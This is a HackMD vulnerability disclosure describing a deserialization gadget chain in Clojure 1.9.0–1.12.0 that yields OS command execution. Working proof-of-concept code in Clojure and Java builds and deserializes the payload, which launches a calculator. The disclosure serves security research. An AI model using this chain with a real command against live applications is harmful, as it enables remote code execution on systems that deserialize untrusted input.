Try   HackMD

Vulnerability Details - Clojure [1.9.0-1.12.0] Command Injection by Deserialization

Vulnerability Description

Under org.clojure:clojure (1.9.0 - 1.12.0), there exists a OS Command Injection initiated through deserialization. Arbitrary command execution can be achieved by constructing suitable objects.

The latest conclusion is that the poc generated by the same version of clojure can directly affect the command execution in the corresponding version, without considering the fn 5920 anonymous function class, see New Way Clojure.

core$partial$fn__5920 is actually obtained by reading the jar file, and I am not very familiar with Clojure.

The discovery of this vulnerability was made using a private tool, but due to a lack of knowledge in Clojure.

Verification Demonstration

Vulnerability demo

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

clojure - Version

Build POC by obtaining anonymous function classes, skipping version restrictions and without process$start.


(ns poc.clojure.command
  (:import (clojure.lang PersistentQueue)
           (java.util HashMap ArrayList))
  (:require clojure.java.process))

(defn set-private-field [obj field-name value]
  (let [field (-> (.getClass obj)
                  (.getDeclaredField field-name))]
    (.setAccessible field true)
    (.set field obj value)))

(defn modify-and-process-model [iterate]
  ;; 创建 PersistentQueue
  (let [model (PersistentQueue/EMPTY)]
    ;; 使用 set-private-field 修改 model
    (set-private-field model "f" iterate)
    ;; 返回修改后的 model
    model))

(defn main []
  ;; 创建 HashMap
  (let [map (HashMap.)
        args ["open" "-a" "calculator"]
        ;; 使用 ns-resolve 获取 start 函数并使用 partial 创建部分应用函数
        fn_start (ns-resolve 'clojure.java.shell 'sh)
        partial-fn (partial apply fn_start)
        ;; 使用 clojure.core/iterate 创建 iterate 实例
        iterate-instance (iterate partial-fn args)]

    (let [model (modify-and-process-model iterate-instance)]
      (set-private-field model "_hash" (int 1))
      (.put map model nil)
      (set-private-field model "_hash" (int 0)))
    
    ;; 序列化 map
    (let [out (java.io.ByteArrayOutputStream.)
          obj-out (java.io.ObjectOutputStream. out)]
      (.writeObject obj-out map)
      (println "Writing is done. Reading...")

      ;; 反序列化
      (let [in (java.io.ByteArrayInputStream. (.toByteArray out))
            obj-in (java.io.ObjectInputStream. in)]
        (.readObject obj-in)))
    )
  )

  ;; 调用 main 函数
(main)

Verification Script

Serialization Data Generation Script

package poc.clojure.rce;

import clojure.core$apply;
import clojure.core$partial$fn__5920;
import clojure.java.process$start;
import clojure.lang.*;
import org.apache.commons.lang3.reflect.FieldUtils;

import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;

/**
 * @author fe1w0
 * @date 2024/1/15 19:20
 * @Project PocALL
 */
public class PocOne {
    public static void main(String[] args) throws IllegalAccessException {

        HashMap<PersistentQueue, Object> map = new HashMap<>();

        List array = new ArrayList();

        process$start p_start = new process$start();

        ArrayList iterate_x = new ArrayList();

        iterate_x.add("open");

        iterate_x.add("-a");

        iterate_x.add("calculator");

        core$apply apply = new core$apply();

        core$partial$fn__5920 core = new core$partial$fn__5920(apply, p_start);

        Iterate iterate = (Iterate) Iterate.create(core, iterate_x);

        array.add(iterate);

        PersistentQueue model = PersistentQueue.EMPTY;

        FieldUtils.writeField(model, "f", iterate, true);

        FieldUtils.writeField(model, "_hash", 1, true);

        map.put(model, null);

        FieldUtils.writeField(model, "_hash", 0, true);

        try {
            FileOutputStream fileOut = new FileOutputStream("output/clojure.ser");
            ObjectOutputStream out = new ObjectOutputStream(fileOut);
            out.writeObject(map);
            out.close();
            fileOut.close();
            System.out.println("Serialized data is saved in output/clojure.ser");
        } catch (IOException i) {
            i.printStackTrace();
        }

        // seq.hashCode();
    }
}

Clojure DeSerialization Script

(ns poc.clojure.rce)

(defn deserialize-obj [filename]
  (with-open [inp (-> (java.io.File. filename) java.io.FileInputStream. java.io.ObjectInputStream.)]
    (.readObject inp)))

(deserialize-obj "/Users/fe1w0/Project/Poc/PocALL/output/clojure.ser")
Last changed by 
fe1w0
0
5179

Read more

hidet - pickle.loads

In apps/compile server/resources/compilation. Py 126 lines, after get complie server validation, the risk of python deserialization attack can achieve command execution, etc.

Jun 15, 2024
(Not Accepted)

Vulnerability Details - Potential Command Execution via Deserialization Exploit Chain in Specific Component Combinations

Mar 21, 2024
Vulnerability Details - Clojure Dos by Deserialization

Translation:

Jan 17, 2024
Read more from fe1w0
Published on HackMD